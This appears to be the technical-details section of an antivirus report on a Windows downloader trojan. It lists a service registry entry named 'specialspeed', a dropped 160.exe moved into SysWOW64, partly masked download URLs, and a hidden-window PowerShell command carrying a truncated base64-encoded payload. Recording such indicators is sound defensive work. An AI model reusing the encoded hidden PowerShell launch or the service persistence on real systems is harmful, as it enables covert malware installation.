Technical information
- [<HKLM>\System\CurrentControlSet\Services\specialspeed] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\specialspeed] 'ImagePath' = '"%WINDIR%\SysWOW64\specialspeed.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABXAHoAcAB0AGUAcABvAG4AcgA9ACcAQQB6AHIAaABsAHkAbQBwAHMAJwA7ACQAUgBvAGgAdgBtAHoAbgBxAHAAbAAgAD0AIAAnADEANgAwACcAOwAkAEIAaAByAHgAbwBpAGQAZABpAHUAYwA9ACcAWgBrAGsAaABwAGQAdQBzACcAOwA...
- %HOMEPATH%\160.exe
- %HOMEPATH%\160.exe to %WINDIR%\syswow64\specialspeed.exe
- http://sa####patil.online/wp-includes/rBhbqf/
- http://15#.#83.25.24/xvnMKSjntiYV
- DNS ASK sa####patil.online
- '%HOMEPATH%\160.exe'
- '%WINDIR%\syswow64\specialspeed.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABXAHoAcAB0AGUAcABvAG4AcgA9ACcAQQB6AHIAaABsAHkAbQBwAHMAJwA7ACQAUgBvAGgAdgBtAHoAbgBxAHAAbAAgAD0AIAAnADEANgAwACcAOwAkAEIAaAByAHgAbwBpAGQAZABpAHUAYwA9ACcAWgBrAGsAaABwAGQAdQBzACcAOwA...' (with a hidden window)